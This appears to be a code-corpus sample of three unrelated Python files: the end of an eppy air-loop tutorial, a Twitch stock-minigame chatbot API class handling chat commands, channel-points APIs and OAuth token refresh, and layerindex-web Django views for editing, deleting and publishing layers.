airloop_idf = IDF(StringIO(""))
loopname = "a_loop"
sloop = ["sb0", ["sb1", "sb2", "sb3"], "sb4"] # supply side of the loop
dloop = ["zone1", "zone2", "zone3"] # zones on the demand side
hvacbuilder.makeairloop(airloop_idf, loopname, sloop, dloop)
airloop_idf.saveas("a_loop.idf")
# <markdowncell>
# Again, just as we did with the plant and condenser loops, we can change the components of the loop by replacing the branches, and traverse the loop using the functions nextnode() and prevnode()
|
import ast
import time
from typing import Union, Dict
import requests
import pickle
import os
import asyncio
from asyncirc.protocol import IrcProtocol
from asyncirc.server import Server
from irclib.parser import Message
from database import User
import database
import contexts
import commands
from termcolor import colored
import contextlib
from more_tools import CachedProperty, BidirectionalMap
from customizable_stuff import load_command_names, load_message_templates
class API:
    """Bridge between the stock-minigame bot and external services.

    Responsibilities visible here: reading Twitch IRC chat (asyncirc) and
    dispatching prefixed commands; talking to the Twitch / Streamlabs /
    StreamElements HTTP APIs for channel-currency points; storing and
    auto-refreshing OAuth tokens in the local database; and exchanging
    messages with a locally-running Streamlabs chatbot via shared buffers.
    """
    def __init__(self, overlord=None, loop=None, prefix="!"):
        self.overlord = overlord
        # Public client id sent with every Twitch Helix request.
        self.twitch_client_id = 'q4nn0g7b07xfo6g1lwhp911spgutps'
        # Ad-hoc cache; also backs CachedProperty invalidation via mark_dirty().
        self._cache = {}
        self.streamlabs_key = ''
        self.twitch_key = ''
        self.twitch_key_requires_refreshing = False
        self.twitch_key_just_refreshed = False
        self.stream_elements_key_requires_refreshing = False
        self.stream_elements_key_just_refreshed = False
        self.stream_elements_key = ''
        self.load_keys()
        self._name = None
        self.users = []
        # IRC connection; created in start_read_chat().
        self.conn = None
        # Chat command prefix, e.g. "!".
        self.prefix = prefix
        self.commands: Dict[str, Union[commands.Command, commands.Group]] = {}
        self.loop = loop
        self.started = False
        self.console_buffer = ['placeholder']
        # self.command_names = {('acquire', None): 'buy', ('my', None): 'my', ('income', 'my'): 'income'}
        self.command_names = {}
        self.load_command_names()
        # self.command_names = {
        #     ('stocks', None): 'stocks',
        #     ('stonks', None): 'stocks',
        # }
        self.console_buffer_done = []
        # Messages queued while the IRC connection is down; flushed by
        # clear_unsent_buffer() once connected.
        self.not_sent_buffer = []
        # Rendezvous buffers/synchronisation for the "streamlabs_local"
        # currency system (request/response over chat).
        self.streamlabs_local_send_buffer = ''
        self.streamlabs_local_receive_buffer = ''
        self.streamlabs_local_buffer_lock = asyncio.Lock()
        self.streamlabs_local_send_buffer_event = asyncio.Event()
        self.streamlabs_local_receive_buffer_event = asyncio.Event()

    def load_keys(self):
        """Load all stored API keys from the database, then validate the Twitch token."""
        session = database.Session()
        self.load_key(key_name='streamlabs_key', session=session)
        self.load_key(key_name='twitch_key', session=session)
        self.load_key(key_name='stream_elements_key', session=session)
        self.validate_twitch_token()

    def load_key(self, key_name, session=None):
        """Load one key from the Settings table into the same-named attribute.

        Falls back to migrating a legacy pickled file at lib/<key_name> into
        the database (and deleting the file).
        NOTE(review): on the migration path the attribute on self is NOT set
        from the unpickled value until the next load — confirm this is intended.
        """
        if session is None:
            session = database.Session()
        key_db = session.query(database.Settings).get(key_name)
        if key_db:
            setattr(self, key_name, key_db.value)
        else:
            if os.path.exists(f'lib/{key_name}'):
                with open(f'lib/{key_name}', 'rb') as f:
                    key = pickle.load(f)
                session.add(database.Settings(key=f'{key_name}', value=key))
                session.commit()
                os.remove(f'lib/{key_name}')

    def get_user(self):
        """:returns: Information regarding the Streamer through Twitch API. Currently used just for fetching the name."""
        if self.tokens_ready:
            url = "https://api.twitch.tv/helix/users"
            headers = {"Authorization": f'Bearer {self.twitch_key}', 'Client-ID': f'{self.twitch_client_id}'}
            res = requests.get(url, headers=headers)
            if res.status_code == 200:
                return res.json()
            else:
                raise ValueError("Tried fetching user info, but failed. Probably an invalid Twitch Token. Tell Razbi.")
        # NOTE(review): this *returns* a ValueError instance instead of raising
        # it — almost certainly meant to be `raise`; confirm before changing.
        return ValueError("Tried fetching user info, but tokens are not ready for use. Tell Razbi. "
                          "If this actually happened, it's really really bad.")

    async def create_context(self, username, session):
        """Build a UserContext for the given chat username (creating the User row if needed)."""
        user = await self.generate_user(username, session=session)
        return contexts.UserContext(user=user, api=self, session=session)

    async def handler(self, conn, message: Union[Message, str]):
        """IRC PRIVMSG callback: parse a chat line and dispatch the matching command."""
        text: str = message.parameters[1].lower()
        if not text.startswith(self.prefix):
            return
        username = message.prefix.user
        text = text[len(self.prefix):]
        old_command_name, *args = text.split()
        # Resolve user-configured aliases: command_names maps
        # (alias, group) -> canonical name.
        command_name = self.command_names.get((old_command_name, None), old_command_name)
        command_name, _, group_name = command_name.partition(" ")
        if group_name:
            args.insert(0, group_name)
        if command_name in self.commands:
            with contextlib.closing(database.Session()) as session:
                ctx = await self.create_context(username, session)
                try:
                    # noinspection PyTypeChecker
                    await self.commands[command_name](ctx, *args)
                except commands.BadArgumentCount as e:
                    self.send_chat_message(f'@{ctx.user.name} Usage: {self.prefix}{e.usage(name=old_command_name)}')
                except commands.CommandError as e:
                    self.send_chat_message(e.msg)

    @staticmethod
    async def generate_user(name, session=None):
        """Fetch the User row for `name`, creating and committing it if absent."""
        local_session = False
        if session is None:
            local_session = True
            session = database.Session()
        user = session.query(User).filter_by(name=name).first()
        if not user:
            user = User(name=name)
            session.add(user)
            session.commit()
        if local_session:
            session.close()
        return user

    async def start_read_chat(self):
        """Connect to Twitch IRC, join the streamer's channel and listen forever."""
        # Wait until something sets self.started (external startup signal).
        while not self.started:
            await asyncio.sleep(.5)
        server = [Server("irc.chat.twitch.tv", 6667, password=f'<PASSWORD>:{self.twitch_key}')]
        self.conn = IrcProtocol(server, nick=self.name, loop=self.loop)
        self.conn.register('PRIVMSG', self.handler)
        await self.conn.connect()
        self.conn.send(f"JOIN #{self.name}")
        print(f"{colored('Ready to read chat commands', 'green')}. "
              f"To see all basic commands type {colored('!stocks', 'magenta')} in the twitch chat")
        self.clear_unsent_buffer()
        if self.currency_system == 'streamlabs_local':
            await self.ping_streamlabs_local()
        # self.conn.send(f"PRIVMSG #{self.name} :I'm testing if this damn thing works")
        # self.conn.send(f"PRIVMSG #{self.name} :hello")
        # Effectively "sleep forever" to keep the connection task alive.
        await asyncio.sleep(24 * 60 * 60 * 365 * 100)

    def send_chat_message(self, message: str):
        """Send a message to the channel's chat; queue it if not yet connected."""
        if self.conn and self.conn.connected:
            self.conn.send(f"PRIVMSG #{self.name} :{message}")
            if message != '':
                print(f"{colored('Message sent:', 'cyan')} {colored(message, 'yellow')}")
                self.console_buffer.append(str(message))
        else:
            self.not_sent_buffer.append(message)

    def clear_unsent_buffer(self):
        """Re-send every message that was queued while the connection was down."""
        if self.not_sent_buffer:
            temp_buffer = self.not_sent_buffer
            self.not_sent_buffer = []
            for element in temp_buffer:
                self.send_chat_message(element)

    async def add_points(self, user: str, amount: int):
        """Add (or, with a negative amount, deduct) currency points for `user`
        via whichever currency system is configured. Returns the new balance
        where the backend provides one."""
        if self.tokens_ready:
            if self.currency_system == 'streamlabs':
                # Streamlabs only exposes "subtract", so add by subtracting
                # the negated amount.
                url = "https://streamlabs.com/api/v1.0/points/subtract"
                querystring = {"access_token": self.streamlabs_key,
                               "username": user,
                               "channel": self.name,
                               "points": -amount}
                return requests.post(url, data=querystring).json()["points"]
            elif self.currency_system == 'stream_elements':
                url = f'https://api.streamelements.com/kappa/v2/points/{self.stream_elements_id}/{user}/{amount}'
                headers = {'Authorization': f'OAuth {self.stream_elements_key}'}
                res = requests.put(url, headers=headers)
                # print(res.json())
                if res.status_code == 200:
                    return res.json()["newAmount"]
                raise ValueError(f"Error encountered while adding points with stream_elements system. HTTP Code {res.status_code}. "
                                 "Please tell Razbi about it.")
                # return requests.put(url, headers=headers).json()["newAmount"]
            elif self.currency_system == 'streamlabs_local':
                await self.request_streamlabs_local_message(f'!add_points {user} {amount}')
                return 'it worked, I guess'
            raise ValueError(f"Unavailable Currency System: {self.currency_system}")
        raise ValueError("Tokens not ready for use. Tell Razbi about this.")

    async def upgraded_add_points(self, user: User, amount: int, session):
        """add_points plus bookkeeping: track lifetime gains/losses on the User row."""
        if amount > 0:
            user.gain += amount
        elif amount < 0:
            user.lost -= amount
        session.commit()
        await self.add_points(user.name, amount)

    def command(self, **kwargs):
        """Decorator: register a chat command in this API's registry."""
        return commands.command(registry=self.commands, **kwargs)

    def group(self, **kwargs):
        """Decorator: register a chat command group in this API's registry."""
        return commands.group(registry=self.commands, **kwargs)

    @property
    def name(self):
        # Streamer's login name, fetched lazily from Twitch and memoized.
        # Returns None implicitly if tokens are not ready yet.
        if self._name:
            return self._name
        if self.tokens_ready:
            self._name = self.get_user()['data'][0]['login']
            return self._name

    @CachedProperty
    def currency_system(self):
        # Which points backend is configured ('streamlabs', 'stream_elements',
        # 'streamlabs_local' or '' when unset); creates the row on first use.
        session = database.Session()
        currency_system_db = session.query(database.Settings).get('currency_system')
        if currency_system_db is not None:
            res = currency_system_db.value
        else:
            res = ''
            session.add(database.Settings(key='currency_system', value=''))
            session.commit()
        return res

    def mark_dirty(self, setting):
        """Invalidate a cached property/value so it is recomputed on next access."""
        if f'{setting}' in self._cache.keys():
            del self._cache[setting]

    def validate_twitch_token(self):
        """Check the stored Twitch token against Twitch's validate endpoint.

        Returns True when valid, False when missing/expired; flags the token
        for refreshing on a 401.
        """
        if not self.twitch_key:
            return False
        url = 'https://id.twitch.tv/oauth2/validate'
        querystring = {'Authorization': f'OAuth {self.twitch_key}'}
        res = requests.get(url=url, headers=querystring)
        if res.status_code == 200:
            self.twitch_key_requires_refreshing = False
            return True
        elif res.status_code == 401:
            if not self.twitch_key_requires_refreshing:
                print("Twitch Token expired. Refreshing Token whenever possible...")
                self.twitch_key_requires_refreshing = True
            return False
        raise ValueError(
            f"A response code appeared that Razbi didn't handle when validating a twitch token, maybe tell him? Response Code: {res.status_code}")

    def validate_stream_elements_key(self):
        """Check the stored StreamElements token; flag it for refresh on 401."""
        if not self.stream_elements_key:
            return False
        url = 'https://api.streamelements.com/oauth2/validate'
        # NOTE(review): this sends self.twitch_key, not
        # self.stream_elements_key — looks like a copy/paste bug; confirm.
        querystring = {'Authorization': f'OAuth {self.twitch_key}'}
        res = requests.get(url=url, headers=querystring)
        if res.status_code == 200:
            self.stream_elements_key_requires_refreshing = False
            return True
        elif res.status_code == 401:
            print("Stream_elements Token expired. Refreshing Token whenever possible...")
            self.stream_elements_key_requires_refreshing = True
            return False
        elif res.status_code >= 500:
            print("server errored or... something. better tell Razbi")
            return False
        raise ValueError(
            f"A response code appeared that Razbi didn't handle when validating a stream_elements token, maybe tell him? Response Code: {res.status_code}")

    @property
    def tokens_ready(self):
        # True once a currency system is chosen and the relevant tokens are
        # present and valid; memoized in self._cache after first success.
        if 'tokens_ready' in self._cache:
            return self._cache['tokens_ready']
        if self.currency_system and self.twitch_key and self.validate_twitch_token():
            if self.currency_system == 'streamlabs' and self.streamlabs_key or \
                    self.currency_system == 'stream_elements' and self.stream_elements_key:
                self._cache['tokens_ready'] = True
                return True
            if self.currency_system == 'streamlabs_local':
                self._cache['tokens_ready'] = True
                # self.send_chat_message('!connect_minigame')
                # print("connected")
                return True
        return False

    @CachedProperty
    def stream_elements_id(self):
        # StreamElements channel id for this streamer; fetched once and
        # persisted in Settings.
        if self.tokens_ready:
            session = database.Session()
            stream_elements_id_db = session.query(database.Settings).get('stream_elements_id')
            if stream_elements_id_db:
                return stream_elements_id_db.value
            url = f'https://api.streamelements.com/kappa/v2/channels/{self.name}'
            headers = {'accept': 'application/json'}
            res = requests.get(url, headers=headers)
            if res.status_code == 200:
                stream_elements_id = res.json()['_id']
                session.add(database.Settings(key='stream_elements_id', value=stream_elements_id))
                return stream_elements_id

    @CachedProperty
    def twitch_key_expires_at(self):
        # Unix timestamp at which the Twitch token expires, or None if unknown.
        session = database.Session()
        expires_at_db = session.query(database.Settings).get('twitch_key_expires_at')
        if expires_at_db:
            expires_at = int(expires_at_db.value)
            return expires_at

    @CachedProperty
    def stream_elements_key_expires_at(self):
        # Unix timestamp at which the StreamElements token expires, or None.
        session = database.Session()
        expires_at_db = session.query(database.Settings).get('stream_elements_key_expires_at')
        if expires_at_db:
            expires_at = int(expires_at_db.value)
            return expires_at

    async def twitch_key_auto_refresher(self):
        """Background task: once a minute, refresh whichever token is within
        60 seconds of expiry via the external refresh service."""
        while True:
            if self.tokens_ready and self.twitch_key_expires_at and time.time() + 60 > self.twitch_key_expires_at:
                url = 'https://razbi.funcity.org/stocks-chat-minigame/twitch/refresh_token'
                querystring = {'access_token': self.twitch_key}
                res = requests.get(url, params=querystring)
                if res.status_code == 200:
                    session = database.Session()
                    twitch_key_db = session.query(database.Settings).get('twitch_key')
                    if twitch_key_db:
                        twitch_key_db.value = res.json()['access_token']
                    expires_at_db = session.query(database.Settings).get('twitch_key_expires_at')
                    if expires_at_db:
                        expires_at_db.value = str(int(time.time()) + res.json()['expires_in'])
                        self.mark_dirty('twitch_key_expires_at')
                    session.commit()
                    print("Twitch key refreshed successfully.")
                elif res.status_code == 500:
                    print(
                        "Tried refreshing the twitch token, but the server is down or smth, please tell Razbi about this. ")
                else:
                    raise ValueError('Unhandled status code when refreshing the twitch key. TELL RAZBI',
                                     res.status_code)
            elif self.tokens_ready and self.currency_system == 'stream_elements' and \
                    self.stream_elements_key_expires_at and time.time() + 60 > self.stream_elements_key_expires_at:
                url = 'https://razbi.funcity.org/stocks-chat-minigame/stream_elements/refresh_token'
                querystring = {'access_token': self.stream_elements_key}
                res = requests.get(url, params=querystring)
                if res.status_code == 200:
                    session = database.Session()
                    stream_element_key_db = session.query(database.Settings).get('stream_elements_key')
                    if stream_element_key_db:
                        stream_element_key_db.value = res.json()['access_token']
                    expires_at_db = session.query(database.Settings).get('stream_elements_key_expires_at')
                    if expires_at_db:
                        expires_at_db.value = str(int(time.time()) + res.json()['expires_in'])
                        self.mark_dirty('stream_elements_key_expires_at')
                    session.commit()
                    print("Stream_elements key refreshed successfully.")
                elif res.status_code == 500:
                    print(
                        "Tried refreshing the stream_elements token, but the server is down or smth, please tell Razbi about this. ")
                else:
                    raise ValueError('Unhandled status code when refreshing the stream_elements key. TELL RAZBI',
                                     res.status_code)
            await asyncio.sleep(60)

    async def ping_streamlabs_local(self):
        """Handshake with the local Streamlabs chatbot over chat."""
        self.send_chat_message('!connect_minigame')
        await self.request_streamlabs_local_message(f'!get_user_points {self.name}')

    async def request_streamlabs_local_message(self, message: str):
        """Send one request to the local Streamlabs chatbot and await its reply.

        The lock serialises requests; the two events form a simple
        send/receive rendezvous with whatever task fills the receive buffer.
        """
        async with self.streamlabs_local_buffer_lock:
            self.streamlabs_local_send_buffer = message
            self.streamlabs_local_send_buffer_event.set()
            await self.streamlabs_local_receive_buffer_event.wait()
            self.streamlabs_local_receive_buffer_event.clear()
            response = self.streamlabs_local_receive_buffer
        return response

    def get_and_format(self, ctx: contexts.UserContext, message_name: str, **formats):
        """Fetch a message template by name (falling back to the defaults) and
        fill in the standard placeholders plus any extras in `formats`."""
        if message_name not in self.overlord.messages:
            default_messages = load_message_templates()
            if message_name in default_messages:
                self.overlord.messages[message_name] = default_messages[message_name]
            else:
                return ''
        return self.overlord.messages[message_name].format(stocks_alias=self.overlord.messages['stocks_alias'],
                                                           company_alias=self.overlord.messages['company_alias'],
                                                           user_name=ctx.user.name,
                                                           currency_name=self.overlord.currency_name,
                                                           stocks_limit=f'{self.overlord.max_stocks_owned:,}',
                                                           **formats)

    def load_command_names(self):
        """Load command-alias mappings from the database, overlaying the defaults."""
        # self.command_names = {('acquire', None): 'buy', ('my', None): 'my', ('income', 'my'): 'income'}
        session = database.Session()
        command_names = session.query(database.Settings).get('command_names')
        if command_names:
            self.command_names = BidirectionalMap(ast.literal_eval(command_names.value))
            # Make sure any newly-added default aliases win over stale DB entries.
            default_command_names = load_command_names()
            for key in default_command_names:
                if key not in self.command_names or self.command_names[key] != default_command_names[key]:
                    self.command_names[key] = default_command_names[key]
        else:
            self.command_names = load_command_names()
            # command_names = database.Settings(key='command_names', value=repr(self.command_names))
            # session.add(command_names)
            # session.commit()
if __name__ == '__main__':
    # Ad-hoc manual test entry point: run the chat reader until interrupted.
    api = API()
    loop = asyncio.get_event_loop()
    # api = API()
    # print(api.get_user('razbith3player'))
    # print(api.get_points('nerzul007'))
    # print(api.twitch_key)
    try:
        loop.run_until_complete(api.start_read_chat())
    finally:
        loop.stop()
    # print(type(api.twitch_key))
    # api.read_chat()
    # loop.run_until_complete(api.read_chat())
# just FYI, if you plan on testing just API alone, do it in the Overlord.py, not here
|
<gh_stars>1-10
# layerindex-web - view definitions
#
# Copyright (C) 2013-2018 Intel Corporation
#
# Licensed under the MIT license, see COPYING.MIT for details
import os
import sys
import re
from datetime import datetime
from itertools import islice
import reversion
from django import forms
from django.contrib import messages
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import Permission, User
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib.sites.models import Site
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import resolve, reverse, reverse_lazy
from django.db import transaction
from django.db.models import Count, Q
from django.db.models.functions import Lower
from django.db.models.query import QuerySet
from django.db.models.signals import pre_save
from django.dispatch import receiver
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import get_list_or_404, get_object_or_404, render
from django.template.loader import get_template
from django.utils.decorators import method_decorator
from django.utils.html import escape
from django.views.decorators.cache import never_cache
from django.views.generic import DetailView, ListView, TemplateView
from django.views.generic.base import RedirectView
from django.views.generic.edit import (CreateView, DeleteView, FormView,
UpdateView)
from django_registration.backends.activation.views import RegistrationView
from pkg_resources import parse_version
from reversion.models import Revision
import settings
from layerindex.forms import (AdvancedRecipeSearchForm, BulkChangeEditFormSet,
ClassicRecipeForm, ClassicRecipeSearchForm,
ComparisonRecipeSelectForm, EditLayerForm,
EditNoteForm, EditProfileForm,
LayerMaintainerFormSet, RecipeChangesetForm,
PatchDispositionForm, PatchDispositionFormSet)
from layerindex.models import (BBAppend, BBClass, Branch, ClassicRecipe,
Distro, DynamicBuildDep, IncFile, LayerBranch,
LayerDependency, LayerItem, LayerMaintainer,
LayerNote, LayerUpdate, Machine, Patch, Recipe,
RecipeChange, RecipeChangeset, Source, StaticBuildDep,
Update, SecurityQuestion, SecurityQuestionAnswer,
UserProfile, PatchDisposition)
from . import tasks, utils
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))
def edit_layernote_view(request, template_name, slug, pk=None):
    """Add a note to a layer, or edit an existing one (when pk is given)."""
    layeritem = get_object_or_404(LayerItem, name=slug)
    if layeritem.comparison:
        raise Http404
    may_edit = request.user.is_authenticated() and (
        request.user.has_perm('layerindex.publish_layer')
        or layeritem.user_can_edit(request.user))
    if not may_edit:
        raise PermissionDenied
    if pk:
        # Edit mode
        layernote = get_object_or_404(LayerNote, pk=pk)
    else:
        # Add mode
        layernote = LayerNote()
        layernote.layer = layeritem
    if request.method == 'POST':
        form = EditNoteForm(request.POST, instance=layernote)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect(layeritem.get_absolute_url())
    else:
        form = EditNoteForm(instance=layernote)
    # Invalid POSTs fall through and re-render with the bound form's errors.
    return render(request, template_name, {
        'form': form,
    })
def delete_layernote_view(request, template_name, slug, pk):
    """Delete a layer note: GET shows a confirmation page, POST deletes."""
    layeritem = get_object_or_404(LayerItem, name=slug)
    if layeritem.comparison:
        raise Http404
    may_edit = request.user.is_authenticated() and (
        request.user.has_perm('layerindex.publish_layer')
        or layeritem.user_can_edit(request.user))
    if not may_edit:
        raise PermissionDenied
    layernote = get_object_or_404(LayerNote, pk=pk)
    if request.method != 'POST':
        # Confirmation page
        return render(request, template_name, {
            'object': layernote,
            'object_type': layernote._meta.verbose_name,
            'cancel_url': layeritem.get_absolute_url()
        })
    layernote.delete()
    return HttpResponseRedirect(layeritem.get_absolute_url())
def delete_layer_view(request, template_name, slug):
    """Delete an unpublished ('N') layer: GET confirms, POST deletes."""
    layeritem = get_object_or_404(LayerItem, name=slug)
    if layeritem.comparison:
        raise Http404
    # Only publishers may delete, and only layers still in 'New' status.
    allowed = (request.user.is_authenticated()
               and request.user.has_perm('layerindex.publish_layer')
               and layeritem.status == 'N')
    if not allowed:
        raise PermissionDenied
    if request.method != 'POST':
        # Confirmation page
        return render(request, template_name, {
            'object': layeritem,
            'object_type': layeritem._meta.verbose_name,
            'cancel_url': layeritem.get_absolute_url()
        })
    layeritem.delete()
    return HttpResponseRedirect(reverse('layer_list', args=('master',)))
def edit_layer_view(request, template_name, branch='master', slug=None):
    """Edit an existing layer (when slug is given) or submit a new one.

    Edit mode requires publish permission or per-layer edit rights; submit
    mode creates a new LayerItem/LayerBranch and emails the reviewers.
    """
    return_url = None
    branchobj = Branch.objects.filter(name=branch)[:1].get()
    if slug:
        # Edit mode
        layeritem = get_object_or_404(LayerItem, name=slug)
        if layeritem.comparison:
            raise Http404
        if not (request.user.is_authenticated() and (request.user.has_perm('layerindex.publish_layer') or layeritem.user_can_edit(request.user))):
            raise PermissionDenied
        layerbranch = get_object_or_404(LayerBranch, layer=layeritem, branch=branchobj)
        # Remember current maintainer emails so new ones can be notified later.
        old_maintainers = list(layerbranch.layermaintainer_set.values_list('email', flat=True))
        deplistlayers = LayerItem.objects.filter(comparison=False).exclude(id=layeritem.id).order_by('name')
        returnto = request.GET.get('returnto', 'layer_item')
        if returnto:
            if returnto == 'layer_review':
                return_url = reverse_lazy(returnto, args=(layeritem.name,))
            else:
                return_url = reverse_lazy(returnto, args=(branch, layeritem.name))
    else:
        # Submit mode
        layeritem = LayerItem()
        layerbranch = LayerBranch(layer=layeritem, branch=branchobj)
        deplistlayers = LayerItem.objects.filter(comparison=False).order_by('name')
    allow_base_type = request.user.has_perm('layerindex.publish_layer') or layeritem.layer_type == 'A'
    if request.method == 'POST':
        last_vcs_url = layeritem.vcs_url
        form = EditLayerForm(request.user, layerbranch, allow_base_type, request.POST, instance=layeritem)
        maintainerformset = LayerMaintainerFormSet(request.POST, instance=layerbranch)
        if form.is_valid() and maintainerformset.is_valid():
            with transaction.atomic():
                reset_last_rev = False
                form.save()
                layerbranch.layer = layeritem
                new_subdir = form.cleaned_data['vcs_subdir']
                # A changed subdirectory invalidates the last-fetched revision.
                if layerbranch.vcs_subdir != new_subdir:
                    layerbranch.vcs_subdir = new_subdir
                    reset_last_rev = True
                layerbranch.save()
                maintainerformset.save()
                if slug:
                    # Sync the dependency records with the submitted set.
                    new_deps = form.cleaned_data['deps']
                    existing_deps = [deprec.dependency for deprec in layerbranch.dependencies_set.all()]
                    reset_last_rev = False
                    for dep in new_deps:
                        if dep not in existing_deps:
                            deprec = LayerDependency()
                            deprec.layerbranch = layerbranch
                            deprec.dependency = dep
                            deprec.save()
                            reset_last_rev = True
                    for dep in existing_deps:
                        if dep not in new_deps:
                            layerbranch.dependencies_set.filter(dependency=dep).delete()
                            reset_last_rev = True
                    if layeritem.vcs_url != last_vcs_url:
                        reset_last_rev = True
                    if reset_last_rev:
                        # Force a full re-fetch/re-parse on the next update run.
                        layerbranch.vcs_last_rev = ''
                        layerbranch.save()
                else:
                    # Save dependencies
                    for dep in form.cleaned_data['deps']:
                        deprec = LayerDependency()
                        deprec.layerbranch = layerbranch
                        deprec.dependency = dep
                        deprec.save()
                    # Send email to everyone with publish permission asking
                    # them to review the new submission.
                    plaintext = get_template('layerindex/submitemail.txt')
                    perm = Permission.objects.get(codename='publish_layer')
                    users = User.objects.filter(Q(groups__permissions=perm) | Q(user_permissions=perm) ).distinct()
                    for user in users:
                        if user.first_name:
                            user_name = user.first_name
                        else:
                            user_name = user.username
                        layer_url = request.build_absolute_uri(reverse('layer_review', args=(layeritem.name,)))
                        if getattr(settings, 'FORCE_REVIEW_HTTPS', False) and layer_url.startswith('http:'):
                            layer_url = 'https:' + layer_url.split(':', 1)[1]
                        d = {
                            'user_name': user_name,
                            'layer_name': layeritem.name,
                            'layer_url': layer_url,
                        }
                        subject = '%s - %s' % (settings.SUBMIT_EMAIL_SUBJECT, layeritem.name)
                        from_email = settings.SUBMIT_EMAIL_FROM
                        to_email = user.email
                        text_content = plaintext.render(d)
                        tasks.send_email.apply_async((subject, text_content, from_email, [to_email]))
                    return HttpResponseRedirect(reverse('submit_layer_thanks'))
            # Email any new maintainers (that aren't us)
            new_maintainers = layerbranch.layermaintainer_set.exclude(email__in=old_maintainers + [request.user.email])
            if new_maintainers:
                for maintainer in new_maintainers:
                    layer_url = request.build_absolute_uri(reverse('layer_item', args=(layerbranch.branch.name, layeritem.name,)))
                    subjecttext = get_template('layerindex/maintemailsubject.txt')
                    bodytext = get_template('layerindex/maintemail.txt')
                    from_email = settings.SUBMIT_EMAIL_FROM
                    # create subject from subject template
                    d = {
                        'layer_name': layeritem.name,
                        'site_name': request.META['HTTP_HOST'],
                    }
                    subject = subjecttext.render(d).rstrip()
                    # create body from body template
                    d = {
                        'maintainer_name': maintainer.name,
                        'layer_name': layeritem.name,
                        'layer_url': layer_url,
                        'help_contact': _get_help_contact(),
                    }
                    body = bodytext.render(d)
                    tasks.send_email.apply_async((subject, body, from_email, [maintainer.email]))
            messages.success(request, 'Layer %s saved successfully.' % layeritem.name)
            if return_url:
                if returnto == 'layer_review':
                    return_url = reverse_lazy(returnto, args=(layeritem.name,))
                else:
                    return_url = reverse_lazy(returnto, args=(branch, layeritem.name))
                return HttpResponseRedirect(return_url)
    else:
        form = EditLayerForm(request.user, layerbranch, allow_base_type, instance=layeritem)
        maintainerformset = LayerMaintainerFormSet(instance=layerbranch)
    return render(request, template_name, {
        'form': form,
        'maintainerformset': maintainerformset,
        'deplistlayers': deplistlayers,
        'allow_base_type': allow_base_type,
        'return_url': return_url,
    })
def bulk_change_edit_view(request, template_name, pk):
    """Edit the individual recipe changes contained in a bulk changeset."""
    changeset = get_object_or_404(RecipeChangeset, pk=pk)
    change_queryset = changeset.recipechange_set.all()
    if request.method == 'POST':
        formset = BulkChangeEditFormSet(request.POST, queryset=change_queryset)
        if formset.is_valid():
            formset.save()
            return HttpResponseRedirect(reverse('bulk_change_review', args=(changeset.id,)))
    else:
        formset = BulkChangeEditFormSet(queryset=change_queryset)
    return render(request, template_name, {
        'formset': formset,
    })
def bulk_change_patch_view(request, pk):
    """Generate and download the patch data for a bulk recipe changeset.

    Invokes the external bulkchange.py script; the last line of its output
    names the generated file (a .tar.gz of patches, or a single diff), which
    is streamed back as an attachment and then deleted.
    """
    changeset = get_object_or_404(RecipeChangeset, pk=pk)
    # FIXME this couples the web server and machine running the update script together,
    # but given that it's a separate script the way is open to decouple them in future
    try:
        ret = utils.runcmd([sys.executable, 'bulkchange.py', str(int(pk)), settings.TEMP_BASE_DIR], os.path.dirname(__file__), shell=False)
        if ret:
            # Last line of the script's stdout is the path to the output file.
            fn = ret.splitlines()[-1]
            if os.path.exists(fn):
                if fn.endswith('.tar.gz'):
                    mimetype = 'application/x-gzip'
                else:
                    mimetype = 'text/x-diff'
                response = HttpResponse(content_type=mimetype)
                response['Content-Disposition'] = 'attachment; filename="%s"' % os.path.basename(fn)
                with open(fn, "rb") as f:
                    data = f.read()
                    response.write(data)
                os.remove(fn)
                return response
        return HttpResponse('No patch data generated', content_type='text/plain')
    except Exception as e:
        output = getattr(e, 'output', None)
        if output:
            if 'timeout' in output:
                return HttpResponse('Failed to generate patches: timed out waiting for lock. Please try again shortly.', content_type='text/plain')
            else:
                return HttpResponse('Failed to generate patches: %s' % output, content_type='text/plain')
        return HttpResponse('Failed to generate patches: %s' % e, content_type='text/plain')
        # FIXME better error handling
def _check_url_branch(kwargs):
    """Validate the 'branch' URL keyword argument.

    Raises Http404 when the branch is 'oe-classic' (not browsable through
    these views) or when no Branch record with that name exists. Returns
    nothing — callers rely purely on the Http404 side effect.
    """
    branchname = kwargs['branch']
    if branchname:
        if branchname == 'oe-classic':
            raise Http404
        # Existence check only: get_object_or_404() raises Http404 for an
        # unknown branch; the fetched object itself was never used, so don't
        # bind it to an unused local.
        get_object_or_404(Branch, name=branchname)
def _get_help_contact():
    """Return the first active staff/superuser account (excluding 'root'), or None."""
    def _eligible(account):
        # Active, non-root accounts with staff or superuser rights qualify.
        return (account.username != 'root'
                and (account.is_staff or account.is_superuser)
                and account.is_active)
    return next((account for account in User.objects.all() if _eligible(account)), None)
def publish_view(request, name):
    """Mark the named layer as published ('P'), emailing its maintainers
    first unless SEND_PUBLISH_EMAIL is disabled. Publishers only."""
    if not (request.user.is_authenticated() and request.user.has_perm('layerindex.publish_layer')):
        raise PermissionDenied
    if getattr(settings, 'SEND_PUBLISH_EMAIL', True):
        layeritem = get_object_or_404(LayerItem, name=name)
        layerbranch = get_object_or_404(LayerBranch, layer=layeritem)
        layer_url = request.build_absolute_uri(reverse('layer_item', args=(layerbranch.branch, layeritem.name)))
        maintainers = get_list_or_404(LayerMaintainer, layerbranch=layerbranch)
        from_email = settings.SUBMIT_EMAIL_FROM
        subjecttext = get_template('layerindex/publishemailsubject.txt')
        bodytext = get_template('layerindex/publishemail.txt')
        maintainer_names = [m.name for m in maintainers]
        # create subject from subject template
        d = {
            'layer_name': layeritem.name,
            'site_name': request.META['HTTP_HOST'],
        }
        subject = subjecttext.render(d).rstrip()
        # create body from body template
        d = {
            'maintainers': maintainer_names,
            'layer_name': layeritem.name,
            'layer_url': layer_url,
            'help_contact': _get_help_contact(),
        }
        body = bodytext.render(d)
        # Mail is dispatched asynchronously via the task queue.
        tasks.send_email.apply_async((subject, body, from_email, [m.email for m in maintainers]))
    return _statuschange(request, name, 'P')
def _statuschange(request, name, newstatus):
    """Move the named (non-comparison) layer to `newstatus`, recording who
